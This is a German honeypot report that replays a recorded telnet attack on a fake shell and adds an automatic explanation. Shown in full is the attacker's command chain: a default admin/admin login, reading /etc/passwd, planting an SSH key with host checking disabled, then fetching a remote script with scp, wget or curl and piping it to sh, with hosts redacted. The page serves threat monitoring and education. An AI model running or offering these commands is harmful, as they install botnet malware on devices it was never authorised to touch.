ALLSmartSecurity
Mitschnitt

Telnet-Angriff aus Vereinigte Staaten: Schadcode nachladen und Benutzerliste auslesen

30.09.2026, 08:45 UTC · 16 Befehle · über telnet · Vereinigte Staaten

Überblick

Dienst
telnet (Port 23)
Herkunft
Vereinigte Staaten · Oracle Corporation
Probierte Zugangsdaten
admin / admin

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
admin@srv01: ~

admin@srv01:~$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
admin@srv01:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr
admin@srv01:~$ echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"
auth_ok
admin@srv01:~$ enable
bash: enable: command not found
admin@srv01:~$ system
bash: system: command not found
admin@srv01:~$ shell
bash: shell: command not found
admin@srv01:~$ sh
admin@srv01:~$ bash
admin@srv01:~$ cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY-----
bash: syntax error near unexpected token `||'
'-----BEGIN OPENSSH PRIVATE KEY-----
admin@srv01:~$ [Token]
bash: [Token]: command not found
admin@srv01:~$ [Token]
bash: [Token]: command not found
admin@srv01:~$ [Token]
bash: [Token]: command not found
admin@srv01:~$ [Token]
bash: [Token]: command not found
admin@srv01:~$ [Token]
bash: [Token]: command not found
admin@srv01:~$ -----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no
bash: syntax error near unexpected token `newline'
'StrictHostKeyChecking no
admin@srv01:~$ UserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -s -F sshcfg -i key.ppk [E-Mail]:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh telnet >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s telnet; fi; rm -rf sshcfg key.ppk out_sh; echo -e "\x72\x65\x64\x74\x61\x69\x6C\x5F\x62\x6F\x74\x5F\x74\x65\x6C\x6E\x65\x74\x5F\…
bash: syntax error near unexpected token `newline'
'rm -rf sshcfg key.ppk out_sh; echo -e "\x72\x65\x64\x74\x61\x69\x6C\x5F\x62\x6F\x74\x5F\x74\x65\x6C\x6E\x65\x74\x5F\x6F\x6B"
redtail_bot_telnet_ok

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Der Angreifer meldete sich über Telnet mit Standardzugangsdaten an. Nach einer kurzen Erkundung der Systemumgebung versuchte er, eine SSH-Schlüsseldatei und eine Konfigurationsdatei im temporären Verzeichnis anzulegen. Anschließend versuchte er, ein Skript von einem externen Server herunterzuladen und auszuführen, wobei er verschiedene Methoden wie SCP, wget und curl nacheinander testete.

Was die Befehle bewirken

Die Befehle id und cat /etc/passwd dienen der Identifikation des Benutzers und der Aufzählung lokaler Konten. Der echo-Befehl schreibt einen Base64-kodierten SSH-Privatschlüssel in eine Datei namens key.ppk. Eine zweite echo-Anweisung erstellt eine SSH-Konfiguration, die die Prüfung fremder Hosts deaktiviert. Der chmod-Befehl setzt die Dateirechte auf 400, was nur dem Besitzer Lesezugriff erlaubt. Der scp-Befehl versucht, eine Datei namens out_sh vom entfernten Host zu kopieren, während wget und curl als Fallback dienen, falls SCP fehlschlägt.

Worauf es hinauslief

Das Ziel ist die Installation einer Backdoor oder eines Botnet-Agents auf dem kompromittierten Gerät. Dies erkennt man am Versuch, ein externes Shell-Skript herunterzuladen und direkt auszuführen, was typisch für die Einbindung in ein Botnetz oder für Kryptomining ist.

Einordnung

Dieses Muster ist sehr verbreitet und stammt oft von automatisierten Botnetzen, die nach Geräten mit Standardpasswörtern suchen.